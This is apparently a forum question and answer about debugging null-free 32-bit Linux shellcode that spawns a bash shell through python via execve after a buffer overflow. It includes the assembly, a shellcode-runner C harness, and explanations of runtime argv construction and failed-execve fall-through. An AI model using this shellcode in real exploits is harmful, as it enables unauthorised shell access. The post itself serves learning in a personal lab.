Update: I have fixed the argv array pointers not being valid causing the continuous loop and have updated the assembly code. Now the only issue is the disappearing space char on compilation.
I’ve been experimenting with executing shellcode after exploiting a buffer overflow on a 32-bit Linux VM. My assembly program simply uses execve to start a shell via python (I wanted to test passing arguments to execve rather than just running /bin/bash). When I assemble the .asm into a standalone program it runs fine, but it fails when I use it as shellcode. To get it to run as shellcode, I know I need to remove null bytes so that they aren’t parsed as string terminators that cut my shellcode off early.
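A quick way to check a payload for this problem is to scan its bytes for 0x00 before embedding it in a C string. The following is a minimal sketch; `first_null_offset` is a hypothetical helper name, not part of any library. For instance, `mov eax, 0xb` assembles to `B8 0B 00 00 00` (three null bytes), whereas `xor eax, eax` followed by `mov al, 0xb` assembles to `31 C0 B0 0B` (none).

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper: returns the offset of the first 0x00 byte in buf,
 * or -1 if the buffer contains no null bytes. */
long first_null_offset(const unsigned char *buf, size_t len)
{
    assert(buf != NULL);
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            return (long)i;   /* a string copy would stop here */
    }
    return -1;
}
```

Calling it on the raw bytes (with an explicit length, not `strlen`) shows where a string-based copy would truncate the shellcode.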
For the sake of testing, I am using a template C program for executing shellcode:
    #include <stdio.h>

    unsigned char code[] = "shellcodegoeshere";

    int main(int argc, char **argv)
    {
        /* Treat the byte array as a function and jump into it. */
        int (*ret)() = (int(*)())code;
        ret();
    }
I changed the relative addressing in my program so that it instead uses offsets from esi once the data address has been popped, replaced every null with “N” to be overwritten at runtime, and wrote 0 into those locations by xor’ing a register with itself and moving its value to those offsets.
My original program is this:
    global _start
    section .text

    _start:
        jmp short call_shellcode

    shellcode:
        pop esi
        lea ebx, [rel arg1]
        lea ecx, [rel args]
        xor edx, edx
        xor eax, eax
        mov eax, 0xb
        int 0x80

    call_shellcode:
        call shellcode
        arg1 db "/usr/bin/python",0
        arg2 db "-c",0
        arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")",0
        args dd arg1, arg2, arg3, 0
and this is what it looks like after I try taking away the null bytes:
    global _start
    section .text

    _start:
        jmp short call_shellcode

    shellcode:
        pop esi
        xor eax, eax
        mov byte [esi+15], al
        mov byte [esi+18], al
        mov byte [esi+53], al
        mov dword [esi+53+4*3], eax
        lea ebx, [esi]
        ;lea ecx, [esi+54] (couldn't be accessed via shellcode)
        xor ecx, ecx
        push ecx
        lea ecx, [esi+19]   ; now will make an array of pointers that can still be accessed via shellcode
        push ecx
        lea ecx, [esi+16]
        push ecx
        lea ecx, [esi]
        push ecx
        mov ecx, esp
        xor edx, edx
        mov al, 0xb
        int 0x80

    call_shellcode:
        call shellcode
        arg1 db "/usr/bin/pythonN"
        arg2 db "-cN"
        arg3 db "import pty; pty.spawn(",34,"/bin/bash",34,")N"
        ;args dd arg1, arg2, arg3, "NNNN" (these addresses were set at compilation meaning they were no longer valid when in shellcode)
When looking at my original program, reading from esi looks like this before the execve call:
However in my modified shellcode with no null bytes, reading from esi looks like this before and after replacing chars, prior to the execve call:
Before:
After:
As you can see, the space in “import pty” disappears for some reason; the 0x20 is even missing from the shellcode when I look at it byte by byte. When this happens, my code reaches the end of main in C and loops again, repeating the shellcode instructions. I’ve tried manually adding the 0x20 back, and although the strings read from esi then match those of my working original program, I still get this loop in gdb that continuously goes back to the start of main via a call to my pop instruction, because the interrupt doesn’t start python successfully:
I know that when the call to execve is successful I shouldn’t reach that bottom instruction. Judging by the missing space character, and the fact that I get a continuous loop even when it’s present, I know I’ve done something wrong going from my original program to this one without null bytes. I just don’t know what it is.
This is what I can read from esi just after the pop:
If anybody could help it would be greatly appreciated. Thanks.
Answer
Failure to invoke Python
The execve syscall is not working properly because args is populated with constant addresses at assembly-time. args must instead be filled with addresses at runtime. In this case, that can be achieved using addresses relative to esi.
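The same idea can be sketched in C: given the runtime address of the packed string data (the role esi plays in the shellcode), patch the “N” placeholders and compute each argv entry as base plus offset. This is only an illustration under the question's layout; `build_argv` is a hypothetical name, and the offsets 15, 16, 18, 19 and 53 are the ones used in the question's modified assembly.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical helper mirroring the shellcode's runtime setup.
 * base points at: "/usr/bin/pythonN-cNimport pty; ...N" */
void build_argv(char *base, char *argv[4])
{
    assert(base != NULL && argv != NULL);

    /* Replace the 'N' placeholders with string terminators. */
    base[15] = '\0';   /* end of "/usr/bin/python" */
    base[18] = '\0';   /* end of "-c"              */
    base[53] = '\0';   /* end of the python command */

    /* Fill the pointer array with addresses computed at runtime. */
    argv[0] = base;        /* arg1 at offset 0  */
    argv[1] = base + 16;   /* arg2 at offset 16 */
    argv[2] = base + 19;   /* arg3 at offset 19 */
    argv[3] = NULL;        /* execve requires a NULL-terminated array */
}
```

Because every pointer is derived from `base`, the array stays valid wherever the data ends up in memory, which is what the assembly-time `args dd arg1, arg2, arg3, 0` could not guarantee.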
Missing space characters
The space characters aren’t missing; they were never there in the first place. Spaces are how shells separate arguments. execve doesn’t separate arguments with anything, because each argument is its own string somewhere in memory. The fact that your three strings are all consecutive in memory and can be printed as one long string is simply a detail of your implementation, and is not a requirement of execve.
Loop
When the execve syscall fails, execution continues to the next instruction:

    call shellcode

If you let this run long enough, you’d get a stack overflow from the number of calls.
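The fall-through behaviour is easy to observe from C, since execve only returns when it fails. The sketch below assumes a Linux/POSIX system; `exec_or_report` is a hypothetical helper name. In the raw syscall form used by the shellcode, the failure shows up as a negative errno value in eax after `int 0x80`, and the CPU simply carries on with whatever bytes follow.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <unistd.h>

/* Hypothetical helper: tries to exec path and returns errno if that fails.
 * On success the process image is replaced and this never returns. */
int exec_or_report(const char *path, char *const argv[])
{
    char *const envp[] = { NULL };   /* empty environment */

    assert(path != NULL && argv != NULL);
    execve(path, argv, envp);

    /* Only reached when execve failed: execution continues here. */
    return errno;
}
```

Checking the return value (or eax in gdb, right after the interrupt) tells you why the call failed, for example ENOENT for a missing path or EFAULT for a bad pointer in argv.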